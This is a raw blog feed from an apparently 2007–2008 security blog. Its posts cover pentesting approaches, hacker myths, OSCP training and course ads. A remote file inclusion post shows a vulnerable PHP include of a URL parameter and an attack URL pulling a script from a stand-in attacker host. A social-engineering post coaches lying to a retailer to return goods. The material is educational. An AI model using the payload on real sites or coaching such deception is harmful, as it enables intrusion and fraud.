id="BLOGGER_PHOTO_ID_5207615563226886130" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Black, white and gray box&lt;/span&gt; tests provide different approaches for assessing the security of your Network and applications. Each approach has specific advantages and disadvantages, and selecting a testing approach needs to be done based on the time and resources available, as well as the overall goals of the test being performed.&lt;br /&gt;You can assume most real-world attackers will approach systems from a black-box perspective. But to better account for the advantage attackers have with regard to time and resources, and to avoid relying on security through obscurity, gray and white box tests can be appropriate approaches as well. Maximizing the security value of testing approaches when you have limited time and resources requires careful test planning and a thorough understanding of how testing constraints affect the completeness of testing results.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Let's take a look at the differences between the three tests.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span&gt;&lt;span style="font-weight: bold;"&gt;Black box testing&lt;/span&gt;&lt;br /&gt;Black box testing refers to testing a system without having specific knowledge to the internal workings of the system, no access to the source code, and no knowledge of the architecture.&lt;br /&gt;In essence, this approach most closely mimics how an attacker typically approaches applications. However, due to the lack of internal application knowledge, the uncovering of bugs and/or vulnerabilities can take significantly longer. Black box tests must be attempted against running instances of applications, so black box testing is typically limited to dynamic analysis such as running automated scanning tools and manual penetration testing.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;White box testing&lt;/span&gt;&lt;br /&gt;White box testing which is also known as clear box testing, refers to testing a system with full knowledge and access to all source code and architecture documents. Having full access to this information can reveal bugs and vulnerabilities more quickly than the "trial and error" method of black box testing. Additionally, you can be sure to get more complete testing coverage by knowing exactly what you have to test.&lt;br /&gt;However, because of the sheer complexity of architectures and volume of source code, white box testing introduces challenges regarding how to best focus the testing and analysis efforts. Also, specialized knowledge and tools are typically required to assist with white box testing, such as debuggers and source code analyzers&lt;br /&gt;In addition, if white box testing is performed using only static analysis techniques using the application source code and without access to a running system, it can be impossible for security analysts to identify flaws in applications that are based on system misconfiguration or other issues that exist only in a deployment environment of the application in question.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Gray box testing&lt;/span&gt;&lt;br /&gt;When we talk about gray box testing we're talking about testing a system while having at least some knowledge of the internals of a system. This knowledge is usually constrained to detailed design documents and architecture diagrams. It is a combination of both black and white box testing, and combines aspects of each.&lt;br /&gt;Gray box testing allows security analysts to run automated and manual penetration tests against a target application. And it allows those analysts to focus and prioritize their efforts based on superior knowledge of the target system. This increased knowledge can result in more significant vulnerabilities being identified with a significantly lower degree of effort and can be a sensible way for analysts to better approximate certain advantages attackers have versus security professionals when assessing applications.&lt;br /&gt;&lt;br /&gt;/Chuks&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-7329425886608214922?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/7329425886608214922/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=7329425886608214922' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/7329425886608214922'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/7329425886608214922'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2008/06/penetration-testing.html' title='Penetration testing'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_J9LOpyWWr2o/SEUqw3zvL_I/AAAAAAAAALo/9flvxodu8H4/s72-c/computer_room.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-7987497742931841483</id><published>2008-04-07T17:45:00.000+03:00</published><updated>2008-04-07T17:51:09.204+03:00</updated><title type='text'>Social Engineering The Act</title><content type='html'>&lt;span class="postbody"&gt;I will be posting all my information on social engineering as i get it and write it. This thread may look crappy now but it will get alot better.&lt;br /&gt;&lt;br /&gt;Section one:&lt;br /&gt;Its all about your act. You must practise who you are and what you wil do. Wether you prefer to act like a reformed gentalmen when you are acting smooth with a lady to get her to tell you somethign or if you are a enraged customer it just matters. Some poeple use a double persona as in the act as two different people.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Section 2:&lt;br /&gt;I cant stress it enough practise practise practise. You need to atleast practise what you will do and how you will act inside your head.&lt;br /&gt;&lt;br /&gt;Section three:&lt;br /&gt;Keywords are important so do research. Such as at target if you want to return something that you got from another store even you jsut say it was a gift you recieved and the recipt wasnt put in the bag by the employe. Now this plays on 2 things One Target has a policy for returnign items and 2 it was thier fualt.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/Chuks&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-7987497742931841483?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/7987497742931841483/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=7987497742931841483' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/7987497742931841483'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/7987497742931841483'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2008/04/social-engineering-act.html' title='Social Engineering The Act'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-3109587419116331980</id><published>2008-03-15T15:46:00.000+03:00</published><updated>2008-03-15T15:58:48.521+03:00</updated><title type='text'>OSCP</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_J9LOpyWWr2o/R9vHKoGNA2I/AAAAAAAAAH4/-nB3Fb4LN3I/s1600-h/oscp.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 320px; height: 135px;" src="http://bp0.blogger.com/_J9LOpyWWr2o/R9vHKoGNA2I/AAAAAAAAAH4/-nB3Fb4LN3I/s320/oscp.jpg" alt="" id="BLOGGER_PHOTO_ID_5177951181968573282" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Hi guys&lt;br /&gt;&lt;br /&gt;I got certified for C.E.H .last year and C.P.T.P. too. This March, I'm doing Offensive Security Certified Professional. I think this is the perfect course for anybody who want to be a pentester by profession. We are in Module 5, on arp spoofing and we are being shown some tactics with scripts like file2cable which proofs to be very effective in a switched network.&lt;br /&gt;&lt;br /&gt;C.E.H. according to what i found out is more of script kiddles, where u get a tool and u just execute it.&lt;br /&gt;&lt;br /&gt;O.S.C.P. is the course, good luck guys.&lt;br /&gt;&lt;br /&gt;/Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-3109587419116331980?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/3109587419116331980/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=3109587419116331980' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/3109587419116331980'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/3109587419116331980'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2008/03/oscp.html' title='OSCP'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_J9LOpyWWr2o/R9vHKoGNA2I/AAAAAAAAAH4/-nB3Fb4LN3I/s72-c/oscp.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-964735138939647076</id><published>2008-03-04T19:46:00.001+03:00</published><updated>2008-03-06T12:18:55.853+03:00</updated><title type='text'>Hacker Myths</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_J9LOpyWWr2o/R8-2Zdye4vI/AAAAAAAAAHw/QF_OHZZUK7c/s1600-h/avatar_1301.gif"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 170px; height: 170px;" src="http://bp0.blogger.com/_J9LOpyWWr2o/R8-2Zdye4vI/AAAAAAAAAHw/QF_OHZZUK7c/s320/avatar_1301.gif" alt="" id="BLOGGER_PHOTO_ID_5174555045481341682" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;All the perceptions of hackers and their portrayal in movies and entertainment have lead to the development of “hacker myths.” These myths involve common misconceptions about hackers and can lead to misconceptions about how to defend against them. Here we have attempted to identify some of these myths and dispel common misconceptions.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;Hackers are a well-organized, malicious group.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;There is indeed a community within the hacker underground. There are hacking-related groups such as Alt-2600 and Cult of the Dead Cow, IRC “hacking” channels, and related newsgroups. However, these groups are not formed into a well-organized group that targets specific networks for hacking. They share a common interest in methods for avoiding security defenses and accessing restricted information.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;If you build it, they will come; and&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;It is safe if you hide in the tall grass.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;Both of these myths represent opposing views on the probability of being hacked. Myth 2 is indicative of the view that once an Internet presence is established, malicious hackers will begin to attempt a compromise. Myth 3 expresses the opinion that there are so many Web sites around that if you just do not make a lot of noise and do not have one of the truly big sites, publicity-seeking hackers will not bother to go after you.&lt;br /&gt;The truth lies somewhere in the middle. You will probably be scanned by users with malicious intent, but it may not happen the moment your systems go online. Some scans will be by groups trying to get an idea of how many Web sites are using a particular piece of software. Others are unethical (but legal) system reconnaissance.&lt;br /&gt;A good plan is to develop a security posture that balances the risk of system compromise with the costs of implementing and maintaining security measures. This will allow you to sleep at night. While you may not stamp out the chance of compromise entirely, you will have done what you can to prevent and limit the compromise without killing your budget.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;Security through obscurity.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;Myth 4 implies that because you are small and unknown or you hide a vulnerability, you are not at risk. For example, according to this myth, if you create a Web site but give the URL only to your friends, you don't have to worry about it being attacked. Another example we have seen is the creation of a backdoor around a firewall by putting a second network card in a DMZ system and directly connecting it to the internal network. People using such a strategy think that because they have hidden the weakness, no one will find it and the organization is safe. However, security through obscurity does not work. Someone will find the weakness or stumble upon it and the systems will be compromised.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;All hackers are the same.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This myth is borne out of a lack of knowledge among the general public about the hacker community. All hackers are not the same. As mentioned above, different hackers focus on different technologies and have different purposes and skill levels. Some hackers have malicious intent; some don't. They are not all teenagers who spend far too much time in front of a computer. Not all hackers are part of a group that defaces Web sites and creates and distributes hacking tools. The range among hackers is great, and you need to defend against them all.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-964735138939647076?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/964735138939647076/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=964735138939647076' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/964735138939647076'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/964735138939647076'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2008/03/hacker-myths.html' title='Hacker Myths'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_J9LOpyWWr2o/R8-2Zdye4vI/AAAAAAAAAHw/QF_OHZZUK7c/s72-c/avatar_1301.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-6307608147511176729</id><published>2008-01-30T12:28:00.000+03:00</published><updated>2008-01-30T12:39:51.147+03:00</updated><title type='text'>BUSY WITH TRAINING</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_J9LOpyWWr2o/R6BFhyoVBqI/AAAAAAAAADY/Nwqc3gxnBeI/s1600-h/brute.png.jpeg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer;" src="http://bp2.blogger.com/_J9LOpyWWr2o/R6BFhyoVBqI/AAAAAAAAADY/Nwqc3gxnBeI/s320/brute.png.jpeg" alt="" id="BLOGGER_PHOTO_ID_5161201619795510946" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Hi guys. I haven't been posting due to the fact i have been doing some training  and alot of field work lately too.&lt;br /&gt;&lt;br /&gt;New stuff is coming in too this coming Feb, so keep tuned.&lt;br /&gt;&lt;br /&gt;If u wish to be in any of my trainings, you can contact me with the number posted in my profile. Training is as follows.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:Times New Roman;"&gt;&lt;u&gt;&lt;b&gt;Assessing and Securing Wireless Networks&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;Few fields are as complex as wireless security. This course breaks down the issues and relevant standards that affect wireless network administrators, auditors, and information security professionals. With hands-on labs and instruction from industry wireless security experts, you will gain an intimate understanding of the risks threatening wireless networks. After identifying risks and attacks, we'll present field-proven techniques for mitigating these risks, leveraging powerful open-source and commercial tools for Linux and Windows systems.&lt;br /&gt;&lt;br /&gt;&lt;u&gt;&lt;b&gt;Network Penetration Testing and Ethical Hacking&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Find Security Flaws Before the Bad Guys Do&lt;br /&gt;&lt;br /&gt;Security vulnerabilities such as weak configurations, unpatched systems, and botched architectures continue to plague organizations. Enterprises need people who can find these flaws in a professional manner to help eradicate them from our infrastructures. Lots of people claim to have penetration testing, ethical hacking, and security assessment skills, but precious few can apply these skills in a methodical regimen of professional testing to help make an organization more secure. This class covers the ingredients for successful network penetration testing to help attendees improve their enterprise's security stance.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;u&gt;&lt;b&gt;Hacker Techniques, Exploits &amp;amp; Incident Handling&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;If your organization has an Internet connection and one or two disgruntled employees (and whose doesn't!), your computer systems will get attacked. From the five, ten, or even one hundred daily probes against your Internet infrastructure to the malicious insider slowly creeping through your most vital information assets, attackers are targeting your systems with increasing viciousness and stealth.&lt;br /&gt;&lt;br /&gt;By helping you understand attackers' tactics and strategies in detail, giving you hands-on experience in finding vulnerabilities and discovering intrusions, and equipping you with a comprehensive incident handling plan, the in-depth information in this course helps you turn the tables on computer attackers. This course addresses the latest cutting-edge insidious attack vectors and the "oldie-but-goodie" attacks that are still so prevalent, and everything in between. Instead of merely teaching a few hack attack tricks, this course includes a time-tested, step-by-step process for responding to computer incidents; a detailed description of how attackers undermine systems so you can prepare, detect, and respond to them; and a hands-on workshop for discovering holes before the bad guys do. Additionally, the course explores the legal issues associated with responding to computer attacks, including employee monitoring, working with law enforcement, and handling evidence.&lt;br /&gt;&lt;br /&gt;&lt;u&gt;&lt;b&gt;Advanced Web Application Penetration Testing&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Assess Your Web Apps in Depth&lt;br /&gt;&lt;br /&gt;Web applications are a major point of vulnerability in organizations today. Web app holes have resulted in the theft of millions of credit cards, major financial and reputational damage for hundreds of enterprises, and even the compromise of thousands of browsing machines that visited web sites altered by attackers. In this class, you'll learn the art of exploiting web applications so you can find flaws in your enterprise's web apps before the bad guys do. Through detailed, hands-on exercises and training from a seasoned professional, you will be taught the four-step process for web application penetration testing. You will inject SQL into back-end databases, learning how attackers exfiltrate sensitive data. You will utilize Cross Site Scripting attacks to dominate a target infrastructure in our unique hands-on laboratory environment. And, you will explore various other web app vulnerabilities in-depth, with tried-and-true techniques for finding them using a structured testing regimen. You will learn the tools and methods of the attacker, so that you can be a powerful defender.&lt;br /&gt;&lt;br /&gt;&lt;u&gt;&lt;b&gt;OTHERS&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;Others like &lt;b&gt;CEH&lt;/b&gt; Certified Ethical hacking and &lt;b&gt;CPTP &lt;/b&gt;Certified Penetration Testing Professional, can be done as evening classes due to that they are very long and can't be finished in a weeks time.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Cheers,&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/Chuks&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-6307608147511176729?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/6307608147511176729/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=6307608147511176729' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/6307608147511176729'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/6307608147511176729'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2008/01/busy-with-training.html' title='BUSY WITH TRAINING'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp2.blogger.com/_J9LOpyWWr2o/R6BFhyoVBqI/AAAAAAAAADY/Nwqc3gxnBeI/s72-c/brute.png.jpeg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-9149063677120878277</id><published>2007-11-07T02:19:00.000+03:00</published><updated>2007-11-07T02:59:33.082+03:00</updated><title type='text'>SOME BASIC REMOTE FILE INCLUSION</title><content type='html'>&lt;span style="color: rgb(255, 255, 255);"&gt;This also called RFI, its where the attacker tries to inject his own php code inside your php app. If an attacker is able to hit this then he could be able to execute any kind of code he wishes to on this webserver.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;In a simple example, if the site is trying to do something like page=page.html to work out which page should be displayed, the code may look something like this:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;   $file =$_GET['page']; //The page we wish to display &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;   include($file); &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt; ?&gt; &lt;/span&gt;&lt;span class="postbody"&gt; &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;If this vulnerability is experienced, this means the intruder can try to make the the code to try and run and pass down to the eg like this.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;www.target.co.ke?page=www.h4x3r.co.ke/evil.txt?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;So the vulnerable server will try to execute:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;   $file ="http://www.h4x3r.co.ke/evil.txt?"; //$_GET['page']; &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;   include($file); //$file is the attackers script &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt; ?&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;So the intruder has this executed. As u can see the attack script is having a .txt but we do put a question mark behind so as to be passed to the vulnerable website. Also we cant use a .php extension due to that we dont want the script to be executed on the attack machine.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;This is the basic part on how to do it, u can google for more and advanced steps to undertake these attack,  how to bypass restrictions and other ways like backconnecting  and binding to the server remote shell interaction. Although this kind of attacks is dieing, u will still find it in alot of servers out there due to careless programming and luck of security audits on these servers. Also admins are to blame due to that they arent aware of how hacks are done and are new to these methods intruders use to pick gates,  jump in and scroll in the server&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;Peace to all,&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;All the best&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 255, 255);"&gt;/Chuks&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-9149063677120878277?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/9149063677120878277/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=9149063677120878277' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/9149063677120878277'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/9149063677120878277'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2007/11/some-basic-remote-file-inclusion.html' title='SOME BASIC REMOTE FILE INCLUSION'/><author><name>Chuks</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-2961536647584233060</id><published>2007-11-06T16:49:00.000+03:00</published><updated>2007-11-06T18:18:57.160+03:00</updated><title type='text'>REMOTE CODE EXECUTION</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_afH8IKGSEeI/RzCFaSZZkxI/AAAAAAAAACc/u5GibH6bpdY/s1600-h/rce1.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://bp0.blogger.com/_afH8IKGSEeI/RzCFaSZZkxI/AAAAAAAAACc/u5GibH6bpdY/s400/rce1.png" alt="" id="BLOGGER_PHOTO_ID_5129746662236459794" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_afH8IKGSEeI/RzCCvSZZkwI/AAAAAAAAACU/J9xQgEAfzEM/s1600-h/rce.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 388px; height: 291px;" src="http://bp0.blogger.com/_afH8IKGSEeI/RzCCvSZZkwI/AAAAAAAAACU/J9xQgEAfzEM/s400/rce.png" alt="" id="BLOGGER_PHOTO_ID_5129743724478829314" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;This is where the intruder uses a vulnerability on your scripts to attack a webserver and executes arbitary commands. We can have a few snapshots of how it can be done. Check here.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Note that this is a very old bug and alot of servers are already patched against them but u will find  a number of servers and sites still vulnerable to this.&lt;br /&gt;&lt;br /&gt;Remote Code Execution also leads to others attacks, Like Local File Inclusions, Remote File Inclusions due to a method we call Gratuitous File Uploads.&lt;br /&gt;&lt;br /&gt;Good week,&lt;br /&gt;&lt;br /&gt;/Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-2961536647584233060?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/2961536647584233060/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=2961536647584233060' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/2961536647584233060'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/2961536647584233060'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2007/11/remote-code-execution.html' title='REMOTE CODE EXECUTION'/><author><name>Chuks</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_afH8IKGSEeI/RzCFaSZZkxI/AAAAAAAAACc/u5GibH6bpdY/s72-c/rce1.png' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-8351680945124269223</id><published>2007-09-25T00:48:00.000+03:00</published><updated>2007-09-25T01:02:14.025+03:00</updated><title 